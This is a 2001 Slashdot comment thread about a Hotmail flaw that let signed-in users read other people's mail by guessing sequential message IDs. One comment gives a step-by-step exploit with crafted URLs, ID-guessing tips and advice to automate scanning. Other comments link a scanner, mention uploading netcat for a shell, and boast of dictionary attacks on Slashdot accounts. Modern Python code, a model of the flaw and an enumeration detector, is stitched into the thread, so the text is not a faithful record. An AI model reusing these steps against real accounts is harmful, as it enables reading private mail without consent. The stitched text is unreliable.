
Hotmail Hacked

CmdrTaco posted more than 12 years ago | from the it-happened-again dept.

Microsoft 494

SyD writes "Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail. A hacking group known as root core discovered the hole and reported it to Microsoft." This isn't the first time that the folks who are gonna give us an internet-wide universal login system have had a hole. The funny part is that I posted a story almost exactly like this like 2 years ago, and about once a week, someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out". No I'm not kidding. You can't make that stuff up.

494 comments

Yes you can (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199796)

CmdrTaco, you can make ANYTHING up. You've often shown you're quite good at it, too. When's that Linux domination thing taking place, again?

Step-by-step hacking tutorial (4, Offtopic)

cyberformer (257332) | more than 12 years ago | (#2199864)

The Register [theregister.co.uk] has a nice guide that explains exactly how you can exploit the hack. [theregister.co.uk]


For script kiddies who don't want to be bothered with the details, there's even a Windows program [can-host.com] that automates the process.

hmmm (0, Troll)

niekze (96793) | more than 12 years ago | (#2199798)

Isn't this *after* they started moving a lot of servers to windoze from FreeBSD?

Yes, probably flame bait... it's in the Hotmail system... so no blame on the OS :)

Oh no! (1, Funny)

Mr. Sketch (111112) | more than 12 years ago | (#2199803)

Now someone ELSE will have to read all my spam too, oh darn. They'd better fix that quick.

Re:Oh no! (1)

jesser (77961) | more than 12 years ago | (#2199827)

I was going to post a similar comment, using the exact same subject. You're too fast.

Re:Oh no! (0)

Anonymous Coward | more than 12 years ago | (#2199844)

I love T1, T1 loves me. We're a hap-py fam-i-ly...

Again? (3, Funny)

SilLumTao (134743) | more than 12 years ago | (#2199808)

Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail.


Score: -1, Redundant

No Kidding... (0, Redundant)

Greyfox (87712) | more than 12 years ago | (#2199931)

I was all set to flame about this story being a year old. Oops. It's a different one. Sorry. My bad.

First Alyson Hannigan post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199810)

yeah more more more Alyson Hannigan.

That hot grits scene on buffy last week caused me to pop my cork!

Re:First Alyson Hannigan post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199863)

She was on Stern last week. Sounded wicked hot. (Yes, I'm from MA. Wicked pissah.)

and this is news? (1, Insightful)

Anonymous Coward | more than 12 years ago | (#2199812)

C'mon, this isn't news; this is just a reality of MS and the everyday world.

Ohh, and don't blame the OS, blame the programmers.

Re:and this is news? (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2199839)

In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said.

Riight, odds of that are what? Take a given hotmail account, and then guess which couple hundred message IDs out of 10 billion correspond to something in their mailbox. Fuck you taco, that's not a security hole, this [goatse.cx] is a security hole.

Hotfemail (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199814)


Re:Hotfemail (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199832)

Where did you get that GIF to text converter and that picture of Alyson Hannigan?

If you tilt down you'll see the hot grits...

Re:Hotfemail (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199853)

http://www.goatse.cx/porn_for_lynx.html

JK (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199815)

JonKatz is responsible for this. Let's kill him now.

Slashdot requires you to wait 20 seconds between hitting 'reply' and submitting a comment.

It's been 13 seconds since you hit 'reply'!

If you this error seems to be incorrect, please provide the following in your report to Source Forge:

Browser type
User ID/Nickname or AC
What steps caused this error
Whether or not you know your ISP to be using a proxy or some sort of service that gives you an IP that others are using simultaneously.
How many posts to this form you successfully submitted during the day* Please choose 'formkeys' for the category!
Thank you.

Uhhhh no.

More info (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2199817)

More info on MSN UK [msn.co.uk]

Re:More info (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2199911)

Heh, the people at Netscape are loving this. You can see them gloating in this article [netscape.com] .

220000th post! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199819)

in yer face!

Re:220000th post! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199851)

YOU SUCK!

read it and weep, you idiot.

The MPAA ROCKS! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199820)

Copyright violations [mpaa.org] are killing the industry. It's time you all stood up and said no to DeCSS and yes to the FITA treaty to protect copyright holders. After all, as long as you don't steal then you're not affected. It's not like you can watch your DVDs on your Linux box or anything.

here's the instructions how to do it (1, Informative)

gol64738 (225528) | more than 12 years ago | (#2199821)

---=[ Three Steps To View Someones Emails In Hotmail (rev.2) ]=---

(Tested with Internet Explorer 5)

To view a full email from someone else's account, do the following:

1. Log in normally to Hotmail with your ID (any ID)

2. Use this type of link to view a specific message from a specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d1%26len%3d9999999999999999%26raw%3d0% 26login%3dusername%26domain%3dhotmail%2ecom&hm___f l=attrd&domain=hotmail.com
or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd ?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2 fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250% 2e22%26start%3d1%26len%3d9999999999999999%26raw%3d 0%26login%3dusername%26domain%3dhotmail%2ecom&hm__ _fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803%2e16 (Message id number; it's simply a counter. %2e is the escape code for ".")
username (Hotmail account name to view)

MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 , MSG943322803%2e149

(remove "%26raw%3d0" if you want to view the email as 'emailbox view' instead of the full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you don't like the Hotmail frame on top.)

Note: You need to have both numbers correct, and that username must have the message, to make this link work.

Note: All those "%2e" etc. are hexadecimal ASCII codes. You need to use them instead of the true characters.
See here for the full list: http://www.december.com/html/spec/ascii.html

3. Done. If you entered the correct message number and that user has it, you will see it. :)
(Test it with messages from your own other Hotmail account first to get the idea working.)

---=[ ideas and comments for improved viewing / scan ]=---

Now, typing those message numbers manually is too much work; you could create a small utility to automatically scan a given range of messages from a specific user name. (You need to build it to work with IE, as you must be logged in to Hotmail when you want to view messages.)

It also helps to know that from the message numbers in your own Hotmail inbox, you can see at about what time a given message number was used, e.g.:

MSG998289581.0 arrived on 20.08.2001
MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you don't need to scan as many message addresses when you know which range you are looking at.

Test messages: (Log in to Hotmail, then use the links to view a message from my test account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d 64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.c om

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3 6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm ail%2ecom&hm___fl=attrd&domain=hotmail.com

*Side note on deleting messages in Hotmail:
-You can also see the message even if it's deleted! If you delete a message in Hotmail, and also empty the trashcan, the message is still viewable using this type of link. At least for 6-12 hrs or something.

---=[.... Status / Feedback / Fixes / Questions .....]---

Changes on the link:

Remove parameter:
%26disk%3d64%2e4%2e36%2e68_d1577
It caused a Hotmail error page in some cases:
"Due to an internal error your request cannot be processed.
We apologize for the inconvenience. Please try again later."
Solution:
Remove that parameter from the link. It's not required.

Changed parameters:
%26start%3d9702%26len%3d9687
into:
%26start%3d1%26len%3d9999999999999999

That is just the start and length of the email to display. If you put too small a value for len, it should display only up to that number of characters(?).

*
If the user doesn't have the message, you will get this error:
"
Subject: Unable to locate message
Content-Type: text/plain; charset=us-ascii
An error has prevented from locating the message."

*
Questions:
Q1. How do I get to know which message number the user has?

A1. You cannot. You just have to guess them, one by one.
Yes, it could mean scanning thousands/millions of messages just to see something. (Slow it is.)

Q2. I've sent a test message to my other account but cannot see it?
And I can still see your test messages, but not my own?

A2. Check again that your MSG number is correct, both X and Y. (MSGXXXXXXXXX.YYY)
The Y value can be between 0-nnn. (I haven't seen bigger than 150.)
Check that the link is correct.
Check that you are logged in to Hotmail.
Also try changing the server, from "pv2fd.pav2.hotmail" to "lw14fd.law14.hotmail".
If you can see the test account messages, then Hotmail hasn't been fixed yet.

Q3. The hobo scanner program doesn't work?
I get some "Path not found (76)" error?

A3. True in most cases.. :)
It has more bugs than Microsoft products, I guess.
It's confirmed that it works at least on Win95. (Latest version is hobo rev.2.)
On WinNT it works but it doesn't save the scans.. (bug in activating the web window..)
Create the output directory yourself; that fixes the path error.

Q4. Where/How can I find this exploit link myself?

A4. 1. Go to your Hotmail preferences page.
2. Go to Mail Display Settings.
3. Set option 'Message Headers' to 'Advanced'.
4. Press OK to save settings.
5. View some email; you will see the full message header.
6. Click 'View E-mail Message Source'.
7. Done. It opens a new window with this exploitable link; you can remove some useless parameters from the link and send it to a friend to test whether they can see your message.

*
No reply or confirmation from Hotmail so far.
The exploit still works, already almost 3 days since I reported it to Hotmail. (Today is 20.08.2001.)

The automated reply from the Hotmail security problem submission page gave this type of message.. :p

"...Hotmail is a secure site and uses an intrusion alert that allows only one IP
address to gain access to a mailbox at a time. If anyone tries to access your
e-mail when your account is open, he or she is returned to the sign-in page.
Hotmail uses state-of-the-art software and firewall protection to offer our
members the highest security...."
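A constructed model of the authorization flaw the post above describes, added here as an example and not rootcore's or the poster's code (the MailStore class and the users alice/mallory are hypothetical): it decodes the MSG<timestamp>.<counter> identifiers quoted in the post to show why they are predictable, and contrasts a lookup that trusts the URL's login parameter with one that binds the read to the authenticated session.

```python
"""Toy model of the Hotmail message-read flaw discussed in the thread.
Constructed for illustration; it imitates the observable behaviour only."""
import re
import secrets
from datetime import datetime, timezone

# Identifiers in the post look like MSG998289581.0: a Unix timestamp in
# seconds followed by a small per-second counter.  That is why they can be
# narrowed to a time window and then enumerated.
MSG_RE = re.compile(r"^MSG(\d{9,10})\.(\d{1,3})$")


def decode_msg_id(msg_id):
    """Return (arrival time in UTC, counter) for an identifier of the
    MSG<epoch>.<counter> form quoted in the post, or None if it does not match."""
    m = MSG_RE.match(msg_id)
    if not m:
        return None
    epoch, counter = int(m.group(1)), int(m.group(2))
    return datetime.fromtimestamp(epoch, tz=timezone.utc), counter


class MailStore:
    """In-memory mailbox keyed the way the post describes: a message is
    addressed by (login, msg_id), and both values arrive in the request URL."""

    def __init__(self):
        self._messages = {}  # (owner, msg_id) -> body

    def deliver(self, owner, msg_id, body):
        self._messages[(owner, msg_id)] = body

    def get_message_vulnerable(self, session_user, login_param, msg_id):
        """Models the flaw: the caller must be signed in (session_user is set),
        but the read uses the URL's 'login' parameter, so any signed-in user
        who guesses a valid msg_id reads another account's message."""
        if session_user is None:
            raise PermissionError("not signed in")
        return self._messages.get((login_param, msg_id))

    def get_message_hardened(self, session_user, login_param, msg_id):
        """Fix: the mailbox read is keyed on the authenticated identity, and a
        mismatching login parameter fails closed (a tampering signal worth
        logging) instead of being honoured."""
        if session_user is None:
            raise PermissionError("not signed in")
        if login_param != session_user:
            raise PermissionError("login parameter does not match session")
        return self._messages.get((session_user, msg_id))


def unguessable_msg_id():
    """Defence in depth: a 128-bit random identifier in place of the
    timestamp-plus-counter scheme, so enumeration stays infeasible even if an
    ownership check is ever missed again."""
    return "MSG" + secrets.token_hex(16)


def demo():
    """Deliver one constructed message to alice, then have mallory (signed in
    to her own account) request it through both code paths.
    Returns (body leaked by the vulnerable path, whether the fix blocked it)."""
    store = MailStore()
    store.deliver("alice", "MSG998289581.0", "constructed private message")
    leaked = store.get_message_vulnerable("mallory", "alice", "MSG998289581.0")
    try:
        store.get_message_hardened("mallory", "alice", "MSG998289581.0")
        blocked = False
    except PermissionError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    when, counter = decode_msg_id("MSG998289581.0")
    print(when.isoformat(), counter)  # the post's "arrived on 20.08.2001"
    print(demo())
```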

Re:here's the instructions how to do it (2, Interesting)

Visionized (465361) | more than 12 years ago | (#2199865)

Ya know, if you could somehow get that posted out somewhere that has greater volumes of general everyday traffic, maybe the rest of the public would start to get the hint at how bad MS is with security issues.

What would be really interesting is to show an example hacking the rest of the sites that use Passport type technology. This would definitely blow holes in MS's idea of being the "gatekeeper".

Or better yet, it might just close the gate!! :)

Cal

Re:here's the instructions how to do it (1)

haz-mat (8531) | more than 12 years ago | (#2199961)

where is this root core website anyway?

Slashdot Hacked! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199822)

goatse.cx writes "Apparently there are major security holes in Slash 2.2 that could allow trolls to post goatse.cx links. A hacking group known as 10gramspoppylatex discovered the hole and reported it to CmdrTaco."

FUCK YOU TACO, FIX YOUR OWN FUCKED UP CODE BEFORE YOU WAG YOUR FINGER AT EVERYONE ELSE IN THE WORLD.

Now if they could only figure out google's cache (0, Offtopic)

moogla (118134) | more than 12 years ago | (#2199828)

I could open internal links on a dead site using google's cache. What is that field next to the URL anyway?

Re:Now if they could only figure out google's cach (1)

HP LoveJet (8592) | more than 12 years ago | (#2199927)

I think it's only for Google's tracking purposes. If you eliminate the alphanumeric code and one of the colons on either side, leaving only
http://www.google.com/search?q=cache:www.foo.com/cached.url
it still works fine.

Slash bug? (-1, Offtopic)

Mr. Sketch (111112) | more than 12 years ago | (#2199829)

There were two comments here when I posted my previous message, and now they're gone, even at -1 and my comment is the only one there. What happened to them? There was one at +1 and it wasn't off topic or anything and it's gone. Has anyone else seen this problem?

Average person? (5, Funny)

Chagrin (128939) | more than 12 years ago | (#2199830)


  • "The average person in the street doesn't need to worry, as they would have to be specifically targeted," said Graham Cluley, an Internet security expert with antivirus firm Sophos.

I suppose the quux is whether I'm an "average person" or not. I think I'll go stand in the street to hedge my bets.

All I can say is this: (2)

Apuleius (6901) | more than 12 years ago | (#2199831)

*whew* Good thing I still have all those y2k supplies.

No no no (2, Interesting)

sllort (442574) | more than 12 years ago | (#2199835)

"In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."

Bring me these experts. If someone thinks my hotmail account(s) leave a clear trail to me, they're insane. They leave a clear trail to my web proxy, perhaps. Most of my accounts only ever receive one email too... "Slashdot password for user Vladinat0r"

Sigh. Experts indeed!

The Registers Have Similar Article (1, Redundant)

robbyjo (315601) | more than 12 years ago | (#2199836)

here [theregister.co.uk]

Link to the hack (1)

Troed (102527) | more than 12 years ago | (#2199837)

Correct link [can-host.com] to the hack-description


(Yeah I got that one rejected when I submitted it ... as usual :)

It's not quite so bad (4, Informative)

Imperator (17614) | more than 12 years ago | (#2199838)

You need to guess the message ID, a longish string based on a timestamp and another number. And once you do that, you still can't read other messages from that account unless you guess them separately. You could try brute-forcing the message IDs, of course, but then you're relying on a fast connection (I believe there are 60 possible message IDs per second, and you rarely know exactly when a message was processed anyway) and fast servers. Besides, after all this, you'll probably find that all the target account's real mail was automatically deleted to make room for WinXP.iso.bat, attached to a message asking for advice.

Re:It's not quite so bad (4, Insightful)

MaxwellStreet (148915) | more than 12 years ago | (#2199944)

Exactly.

This isn't the "major" security hole that the slashdot submission suggested.

It would take a minor miracle to guess a message number correctly.

And considering what *I* use hotmail for, namely, a spam catcher, any hacker that got lucky enough would probably discover yet another way to get rich quick. If someone really wanted to read my email there, they could keep trying - but their hotmail username (at very least) would be recorded.

I don't mean to pooh-pooh this issue; but I think editorializing this into a *major* security problem (a la Code Red) is a little disingenuous, and misguided.

Here's rootcore's info (1)

Zen (8377) | more than 12 years ago | (#2199840)

Here [can-host.com] is the release from rootcore, and here [can-host.com] is their exploit. Since the post is low on technical details, here goes. It's pretty simple. Messages are specified by a number. This program guesses the number.

big whooop (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199841)

hotmail is not secure.

fuckers.

so what else is new? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199842)

old fucking news chumps...

220000th btw...

From my understanding of things... (1)

Digitalia (127982) | more than 12 years ago | (#2199843)

It isn't Passport which is flawed but the system of Hotmail itself. This is merely an exploitation of bad data structure that is independent from Passport. That said, if you care about the security of your private communications, don't use Hotmail. Duh?

The details of the hole... (5, Funny)

kcbrown (7426) | more than 12 years ago | (#2199845)


% telnet www.hotmail.com 80
Trying 64.4.43.7...
Connected to 64.4.43.7.
Escape character is '^]'.
GET /root.exe
What is thy bidding, my master?


Guess they haven't gotten rid of Code Red yet! :-)

(For the humor impaired: no, I did not actually do the telnet session.)

Re:The details of the hole... (1)

Emugamer (143719) | more than 12 years ago | (#2199953)

20 seconds later all of hotmail is down..... coincidence? I think not... beware of user friendly police on their way to your door

dumbass (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#2199956)

If you've ever read the story or even tested code red you would know that IIS runs as a guest account with limited permissions. So you upload nc.exe and start a telnet session on some port. You can't grab the contents of the sam file or install any more backdoors.

Oh no (4, Insightful)

interstellar_donkey (200782) | more than 12 years ago | (#2199846)

Now anyone can get in and read all the porn ads I get in my hotmail inbox.

Who to blame (1)

madiab (170896) | more than 12 years ago | (#2199847)

So another bug found. My question is, why is the whole world afraid of hackers and crackers (don't even bother to argue the difference)? I think that they shouldn't be afraid of the ones telling about the bugs but of the ones that make them... See no evil, hear no evil, talk no evil....

One nice thing (2)

rjamestaylor (117847) | more than 12 years ago | (#2199849)

Hotmail is predictable. Down, insecure, loses messages. You can count on it to fail you. I've been using Hotmail for a few years now and cannot remember a time when it was as bad as it is now! Slow, lost Body portions of the messages...cannot connect...

I'm glad for Onebox and my regular email accounts.

Sure, some would say, "It's free; shut up!" But: MS is __still__ claiming to provide a service even though there is no direct cost to me. That there's no cost doesn't mean I don't expect the service to be useable. My recourse is to leave. Is that what MS wants?

Oh, as an aside, I hope the message #292192399 bug is never fixed - "Imagine if there's no First Posts...It's easy if you try..."

Re:One nice thing (1)

jallen02 (124384) | more than 12 years ago | (#2199965)

I kind of like it with the messages numbered in the millions. :)

hotmail sucks! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199852)

220000th in yer face.

Re:hotmail sucks! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199883)

#2199852>> 220000th in yer face.

Ouch...face plants are so painful!

Why is MS reaping the benefits of OSS security? (4, Insightful)

Bonker (243350) | more than 12 years ago | (#2199854)

A monopoly is a scary thing.

Despite the fact that MS believes very firmly in a security-through-obscurity model of business, they have both benevolent and malicious hackers and crackers worldwide working to expose as many of their security holes as possible, thereby forcing MS to patch those holes. Code Red would still be unpatched if eEye hadn't released its exploit POC. This exploit would still be out in the open and freely abusable if it hadn't been released.

Since MS is the 'standard' for most internet users, it's also the recipient of all the world's unsolicited security advice.

Re:Why is MS reaping the benefits of OSS security? (0)

Anonymous Coward | more than 12 years ago | (#2199926)

Actually code red was based on another worm, and the exploit released was not eEye's either. They did however release an advisory which gave people some heads up. But saying code red would be unpatched.....pull your head out of your ass.

Use yahoo mail... (0)

Anonymous Coward | more than 12 years ago | (#2199855)

Not a single security flaw yet discovered that allows unauthorized email access, and it's been running for 4+ years.

220000th! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199857)

220000th post! read it and weep!

Grimace, McDonalds character, dead at 13 (-1, Insightful)

Anonymous Coward | more than 12 years ago | (#2199859)

I just heard sad news on talk radio -McDonalds commercial star/character Grimace was found dead in his McDonalds house this morning. I'm sure we'll all miss him - even if you didn't eat his food you've probably enjoyed one of his pornographic movies. Truly a purple American homosexual.

Related Link [mcdonalds.com]

Go with Yahoo! Mail. (2, Informative)

boinger (4618) | more than 12 years ago | (#2199861)

Yahoo! Mail [slashdot.org] has never had such a flaw exposed, has it?

And Yahoo! Messenger kicks AIM's and MSN Messenger's asses.

Why tempt fate?

Re:Go with Yahoo! Mail. (1)

boinger (4618) | more than 12 years ago | (#2199880)

Whoops.
Yahoo! Mail [yahoo.com] - forgot that damn http:// :)

220000 alyson hannigans (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199862)

drool...

think of all the grits, enough to fill a large city...

We've tracked the intruder! (1)

sgt_getraer (448034) | more than 12 years ago | (#2199869)

"In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."

Ah yes, that clear trail to a dead end makes me feel much more secure...

hot males! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199870)

220000th slut!

take that!

previous incident.... (1)

jeffy124 (453342) | more than 12 years ago | (#2199871)

The previous case from 2 years ago Taco speaks of can be found here [slashdot.org]

Re:previous incident (0)

Anonymous Coward | more than 12 years ago | (#2199908)

it's in the Hall of Fame [slashdot.org] !

oh ya baby! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199872)

2200000th post! you know you want it!

Big Surprise - More info... (4, Informative)

tre (172905) | more than 12 years ago | (#2199874)

blah blah, we expect this from MS... blah blah, when will they get their act together...

This was already posted to BugTraq [securityfocus.com] not too long ago. For a more technical breakdown of the details surrounding the Hotmail vulnerability, go here:

http://www.securityfocus.com/archive/1/205785 [securityfocus.com]

PLEASE! (2, Funny)

plemeljr (250971) | more than 12 years ago | (#2199876)

* Will someone please think of the children! *

yo yo yo (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199877)

2200000th post!

read it and weep.

Re:yo yo yo (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199892)

STUPID

YOU

ARE

Invalid form key: ru1VqvJlny !

If you this error seems to be incorrect, please provide the following in your report to Source Forge:

* Browser type
* User ID/Nickname or AC
* What steps caused this error
* Whether or not you know your ISP to be using a proxy or some sort of service that gives you an IP that others are using simultaneously.
* How many posts to this form you successfully submitted during the day

* Please choose 'formkeys' for the category!
Thank you.

Microsoft's response... (5, Funny)

ddstreet (49825) | more than 12 years ago | (#2199879)

...is priceless:


"However," Microsoft said, "we recognize the concerns raised in the computational infeasibility of this mechanism and are investigating ways that we can raise this bar even higher."


Like Taco said...you just can't make this stuff up. That response is just too funny.

foo (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199885)

bar

muahahahhah (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199887)

220000th post is all mine!

universal variables (2, Interesting)

Traicovn (226034) | more than 12 years ago | (#2199888)

The more parts of a program you have referencing any single variable in C/C++ programming, the more chance for a margin of error you have.

Security works the same way. The more places you use a key, or the more people you give a copy of your key to, the higher risk you have for errors, being hacked, identity theft, being robbed, etc. A 'single sign-on' like the MSN/Hotmail Passport or AOL's new Single-Signon or Screenname (not sure what they are calling it) that all AIM accounts/AOL accounts have now become is just another invitation of risk.

Users need to be alerted of this fact, that these systems may not be secure, and users need to understand that the more people who they use their single sign-on for, the higher the risk becomes.

In this situation though, you have to wonder. If the person issuing the 'keys', microsoft in this case, does not do a good job of protecting them and making sure that their security is up to date, can it be any better than if you had a safe deposit box that sat unlocked in the middle of Times Square?

I can't wait to see what happens when in addition to all these Single Sign-on and Passport type programs, that we have Digital Signatures too. That should be interesting.

follow up to the Grimace death post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199890)


Re:follow up to the Grimace death post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199906)

You've done it now, you fucker. McDonalds are going to come down on Trademark infringement like you won't believe...

Re:follow up to the Grimace death post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199932)

good, maybe i'll countersue and get a free ShitMac out of it.

oh yes! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199895)

what number is this?

2200000th?

oh yes i think so!

220000th post~ (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199897)

two hundred and twenty thousandth post! what wehat what!

i got the post! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199901)

i got 220000th post. you don't. haha.

Finding a specific message not easy (1, Informative)

Anonymous Coward | more than 12 years ago | (#2199904)

Finding a valid message number is of course total guesswork, but they do all follow a consistent format and always have the same number of digits (i.e., a time stamp), so with the help of a little brute-force program one could (if one was into these things) try numerous combinations in the background rather than type them in.

So the hacking danger here is very much limited by the need to guess message numbers, which is slow going. And while there is a handy program for bruting the numbers it's quite slow, trying only about one message page per second in 'fast' mode.

There's a little story about it on the msn.co.uk [msn.co.uk] website
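The enumeration pattern the comment above describes (a client walking fixed-width message numbers in order, at roughly one request per second) is something the service side can spot in its own access logs. The following detector is an added, defender-side example, not code from the post or from Hotmail; the log line shape, the 10-digit message number, the thresholds and the sample lines are all constructed assumptions.

```python
import re
from collections import defaultdict

# Assumed log shape (constructed for this example, not Hotmail's real format):
# "<client-ip> <unix-time> GET /getmsg?msg=<10-digit message number>"
LINE_RE = re.compile(r"^(\S+) (\d+) GET /getmsg\?msg=(\d{10})$")

def parse(log_text):
    """Return {client: [(time, msg_number), ...]} in log order."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            hits[m.group(1)].append((int(m.group(2)), int(m.group(3))))
    return hits

def is_enumerating(events, window=60, min_requests=20, max_step=10):
    """True if, inside any `window` seconds, the client fetched at least
    `min_requests` distinct message numbers and every successive number was
    at most `max_step` away from the previous one. A legitimate reader opens
    a few unrelated messages; a guesser walks the number space in order."""
    events = sorted(events)
    start = 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window:
            start += 1
        span = events[start:end + 1]
        if len({msg for _, msg in span}) < min_requests:
            continue
        steps = [abs(b[1] - a[1]) for a, b in zip(span, span[1:])]
        if steps and max(steps) <= max_step:
            return True
    return False

def flag_clients(log_text, **kw):
    """Sorted list of clients whose request pattern looks like enumeration."""
    return sorted(c for c, ev in parse(log_text).items() if is_enumerating(ev, **kw))

# Constructed sample: 10.0.0.5 reads three unrelated messages over ten
# minutes; 10.0.0.9 tries 25 consecutive numbers at one request per second.
NORMAL = [f"10.0.0.5 {1000 + i * 200} GET /getmsg?msg={9980000000 + n}"
          for i, n in enumerate((123456, 987654, 555000))]
GUESSER = [f"10.0.0.9 {2000 + i} GET /getmsg?msg={9980200000 + i}" for i in range(25)]
SAMPLE_LOG = "\n".join(NORMAL + GUESSER)

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))  # ['10.0.0.9']
```

A client that only guesses at the pace the comment reports still trips the window threshold; spacing the guesses out to several seconds apart drops below it, which is the trade-off any such rate-based rule carries.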

i have a bad feeling about this (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199907)

2200000

Re:i have a bad feeling about this (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199919)

2200000.01

220000th (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199909)

don't take your eyes off the prize!

220000th is mine!

Well... (1)

Ford Fulkerson (223443) | more than 12 years ago | (#2199912)

someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out".


...did s/he?

Hacked.... yeah right (1)

Pu22L3R (173070) | more than 12 years ago | (#2199913)

I think Microsoft makes the holes themselves, does any other "large" organization have this much trouble? I am willing to bet you can't get into Bill Gates' house without some sort of "rent-a-cop" cause there may be a security hole there too...

what number??? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199914)

could it be? really? truely?

2200000th!!!!

hurrah!

220000th? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199915)

awww ya baby! come on!

Security hole? (1)

Saint Aardvark (159009) | more than 12 years ago | (#2199916)

Now I can finally write a LISP program to pick up my hotmail...I'm never leaving Emacs again!

again? (2)

josepha48 (13953) | more than 12 years ago | (#2199921)

Weren't they hacked a little while ago? Something about passwords or usernames or something?

I'm glad I stopped using them years ago, when M$ took over. I kinda knew that their service was going down.

Let's see, they were hacked once, then the red worm did a little damage, now they are hacked again... hmm can't wait for .net, so that everyone can read my design documents. hmm do you think they'll have local or remote storage with .net???

It's too bad that they are such a hackers' target and they do little in the way of security. I wonder how strong the M$ firewall will be in XP..

I know it may seem a bit trollish, and would be surprised if someone did not ask questions, but then again there are those that follow blindly.. Are you a sheep or a wolf?

2200000th Alyson Hannigan post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199922)

so many Alysons.. so little time

more grits please!

Dear Rob (-1, Troll)

Shoeboy (16224) | more than 12 years ago | (#2199925)

I feel compelled to say something about pots, kettles and African-Americans here. Slashdot has had and continues to have numerous holes.

I'll skip over the 2 times that you were hacked and focus on a pair of luckless users:
AxelBoldt [slashdot.org] and Randal Schwartz [slashdot.org] .

Both these users had their accounts stolen by a brilliant and handsome young foot-fetishist due to flaws in slashcode. AxelBoldt used "AxelBoldt" as his password, and was then embarrassed to find several passionate screeds about Heidi Wall posted under his name. Poor Randal Schwartz posted even more embarrassing material [slashdot.org], but that's what he gets for using a password of "slashdot".

Anyway Rob, I'm not criticizing, I just think that before you go casting stones at hotmail, you should at least enforce some password standards on slashdot and develop a method of detecting and blocking the dictionary attacks I've been running.

Your friend,
--Shoeboy

you know! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199928)

220000th!

who's the man?

oh ya! it's me!

'Found it' ? (2)

q-soe (466472) | more than 12 years ago | (#2199929)

